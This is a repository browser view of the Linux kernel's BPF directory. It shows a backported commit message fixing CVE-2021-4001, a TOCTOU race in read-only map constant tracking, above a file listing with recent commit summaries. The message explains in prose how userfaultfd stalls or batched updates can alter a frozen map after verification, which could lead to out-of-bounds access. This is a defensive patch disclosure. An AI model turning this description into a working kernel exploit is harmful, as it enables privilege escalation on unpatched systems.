kernel_optimize_test/kernel/bpf
Daniel Borkmann 33fe044f6a bpf: Fix toctou on read-only map's constant scalar tracking
commit 353050be4c19e102178ccc05988101887c25ae53 upstream.

Commit a23740ec43 ("bpf: Track contents of read-only maps as scalars") is
checking whether maps are read-only both from BPF program side and user space
side, and then, given their content is constant, reading out their data via
map->ops->map_direct_value_addr() which is then subsequently used as known
scalar value for the register, that is, it is marked as __mark_reg_known()
with the read value at verification time. Before a23740ec43, the register
content was marked as an unknown scalar so the verifier could not make any
assumptions about the map content.

The current implementation however is prone to a TOCTOU race, meaning, the
value read as known scalar for the register is not guaranteed to be exactly
the same at a later point when the program is executed, and as such, the
prior made assumptions of the verifier with regards to the program will be
invalid which can cause issues such as OOB access, etc.

While the BPF_F_RDONLY_PROG map flag is always fixed and required to be
specified at map creation time, the map->frozen property is initially set to
false for the map given the map value needs to be populated, e.g. for global
data sections. Once complete, the loader "freezes" the map from user space
such that no subsequent updates/deletes are possible anymore. For the rest
of the lifetime of the map, this freeze one-time trigger cannot be undone
anymore after a successful BPF_MAP_FREEZE cmd return. Meaning, any new BPF_*
cmd calls which would update/delete map entries will be rejected with -EPERM
since map_get_sys_perms() removes the FMODE_CAN_WRITE permission. This also
means that pending update/delete map entries must still complete before this
guarantee is given. This corner case is not an issue for loaders since they
create and prepare such program private map in successive steps.

However, a malicious user is able to trigger this TOCTOU race in two different
ways: i) via userfaultfd, and ii) via batched updates. For i) userfaultfd is
used to expand the competition interval, so that map_update_elem() can modify
the contents of the map after map_freeze() and bpf_prog_load() were executed.
This works, because userfaultfd halts the parallel thread which triggered a
map_update_elem() at the time where we copy key/value from the user buffer and
this already passed the FMODE_CAN_WRITE capability test given at that time the
map was not "frozen". Then, the main thread performs the map_freeze() and
bpf_prog_load(), and once that had completed successfully, the other thread
is woken up to complete the pending map_update_elem() which then changes the
map content. For ii) the idea of the batched update is similar, meaning, when
there are a large number of updates to be processed, it can increase the
competition interval between the two. It is therefore possible in practice to
modify the contents of the map after executing map_freeze() and bpf_prog_load().

One way to fix both i) and ii) at the same time is to expand the use of the
map's map->writecnt. The latter was introduced in fc9702273e ("bpf: Add mmap()
support for BPF_MAP_TYPE_ARRAY") and further refined in 1f6cb19be2 ("bpf:
Prevent re-mmap()'ing BPF map as writable for initially r/o mapping") with
the rationale to make a writable mmap()'ing of a map mutually exclusive with
read-only freezing. The counter indicates writable mmap() mappings and then
prevents/fails the freeze operation. Its semantics can be expanded beyond
just mmap() by generally indicating ongoing write phases. This would essentially
span any parallel regular and batched flavor of update/delete operation and
then also have map_freeze() fail with -EBUSY. For the check_mem_access() in
the verifier we expand upon the bpf_map_is_rdonly() check ensuring that all
last pending writes have completed via bpf_map_write_active() test. Once the
map->frozen is set and bpf_map_write_active() indicates a map->writecnt of 0
only then we are really guaranteed to use the map's data as known constants.
For map->frozen being set and pending writes in process of still being completed
we fall back to marking that register as unknown scalar so we don't end up
making assumptions about it. With this, both TOCTOU reproducers from i) and
ii) are fixed.

Note that the map->writecnt has been converted into a atomic64 in the fix in
order to avoid a double freeze_mutex mutex_{un,}lock() pair when updating
map->writecnt in the various map update/delete BPF_* cmd flavors. Spanning
the freeze_mutex over entire map update/delete operations in syscall side
would not be possible due to then causing everything to be serialized.
Similarly, something like synchronize_rcu() after setting map->frozen to wait
for update/deletes to complete is not possible either since it would also
have to span the user copy which can sleep. On the libbpf side, this won't
break d66562fba1 ("libbpf: Add BPF object skeleton support") as the
anonymous mmap()-ed "map initialization image" is remapped as a BPF map-backed
mmap()-ed memory where for .rodata it's non-writable.

Fixes: a23740ec43 ("bpf: Track contents of read-only maps as scalars")
Reported-by: w1tcher.bupt@gmail.com
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Andrii Nakryiko <andrii@kernel.org>
Signed-off-by: Alexei Starovoitov <ast@kernel.org>
[fix conflict to call bpf_map_write_active_dec() in err_put block.
fix conflict to insert new functions after find_and_alloc_map().]
Reference: CVE-2021-4001
Signed-off-by: Masami Ichikawa(CIP) <masami.ichikawa@cybertrust.co.jp>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2021-12-01 09:18:58 +01:00
..
preload bpf: Fix umd memory leak in copy_process() 2021-03-30 14:32:03 +02:00
arraymap.c bpf: Fix potential race in tail call compatibility check 2021-11-02 19:48:21 +01:00
bpf_inode_storage.c bpf: Change inode_storage's lookup_elem return value from NULL to -EBADF 2021-03-30 14:31:56 +02:00
bpf_iter.c bpf: Fix an unitialized value in bpf_iter 2021-03-04 11:37:33 +01:00
bpf_local_storage.c bpf: Use hlist_add_head_rcu when linking to local_storage 2020-09-19 01:12:35 +02:00
bpf_lru_list.c bpf_lru_list: Read double-checked variable once without lock 2021-03-04 11:37:29 +01:00
bpf_lru_list.h
bpf_lsm.c bpf: Update verification logic for LSM programs 2020-11-06 13:15:21 -08:00
bpf_struct_ops_types.h
bpf_struct_ops.c bpf: Handle return value of BPF_PROG_TYPE_STRUCT_OPS prog 2021-10-06 15:55:50 +02:00
btf.c bpf: Forbid trampoline attach for functions with variable arguments 2021-06-16 12:01:35 +02:00
cgroup.c bpf, cgroup: Fix problematic bounds check 2021-02-10 09:29:12 +01:00
core.c bpf: Prevent increasing bpf_jit_limit above max 2021-11-18 14:03:42 +01:00
cpumap.c bpf, cpumap: Remove rcpu pointer from cpu_map_build_skb signature 2020-09-28 23:30:42 +02:00
devmap.c bpf, devmap: Use GFP_KERNEL for xdp bulk queue allocation 2021-03-04 11:37:33 +01:00
disasm.c bpf: Introduce BPF nospec instruction for mitigating Spectre v4 2021-08-04 12:46:44 +02:00
disasm.h
dispatcher.c
hashtab.c bpf: Fix integer overflow involving bucket_size 2021-08-18 08:59:10 +02:00
helpers.c bpf: Fix potentially incorrect results with bpf_get_local_storage() 2021-09-03 10:09:31 +02:00
inode.c bpf: link: Refuse non-O_RDWR flags in BPF_OBJ_GET 2021-04-14 08:42:00 +02:00
local_storage.c bpf: Fix NULL pointer dereference in bpf_get_local_storage() helper 2021-09-03 10:09:21 +02:00
lpm_trie.c bpf: Add map_meta_equal map ops 2020-08-28 15:41:30 +02:00
Makefile bpf: Don't rely on GCC __attribute__((optimize)) to disable GCSE 2020-10-29 20:01:46 -07:00
map_in_map.c bpf: Relax max_entries check for most of the inner map types 2020-08-28 15:41:30 +02:00
map_in_map.h bpf: Add map_meta_equal map ops 2020-08-28 15:41:30 +02:00
map_iter.c bpf: Implement link_query callbacks in map element iterators 2020-08-21 14:01:39 -07:00
net_namespace.c bpf: Add support for forced LINK_DETACH command 2020-08-01 20:38:28 -07:00
offload.c
percpu_freelist.c bpf: Use raw_spin_trylock() for pcpu_freelist_push/pop in NMI 2020-10-06 00:04:11 +02:00
percpu_freelist.h bpf: Use raw_spin_trylock() for pcpu_freelist_push/pop in NMI 2020-10-06 00:04:11 +02:00
prog_iter.c bpf: Refactor bpf_iter_reg to have separate seq_info member 2020-07-25 20:16:32 -07:00
queue_stack_maps.c bpf: Add map_meta_equal map ops 2020-08-28 15:41:30 +02:00
reuseport_array.c bpf, net: Rework cookie generator as per-cpu one 2020-09-30 11:50:35 -07:00
ringbuf.c bpf: Fix false positive kmemleak report in bpf_ringbuf_area_alloc() 2021-07-19 09:44:54 +02:00
stackmap.c bpf: Fix integer overflow in prealloc_elems_and_freelist() 2021-10-13 10:04:26 +02:00
syscall.c bpf: Fix toctou on read-only map's constant scalar tracking 2021-12-01 09:18:58 +01:00
sysfs_btf.c bpf: Fix sysfs export of empty BTF section 2020-09-21 21:50:24 +02:00
task_iter.c bpf: Save correct stopping point in file seq iteration 2021-01-19 18:27:28 +01:00
tnum.c
trampoline.c bpf: Fix fexit trampoline. 2021-04-07 15:00:03 +02:00
verifier.c bpf: Fix toctou on read-only map's constant scalar tracking 2021-12-01 09:18:58 +01:00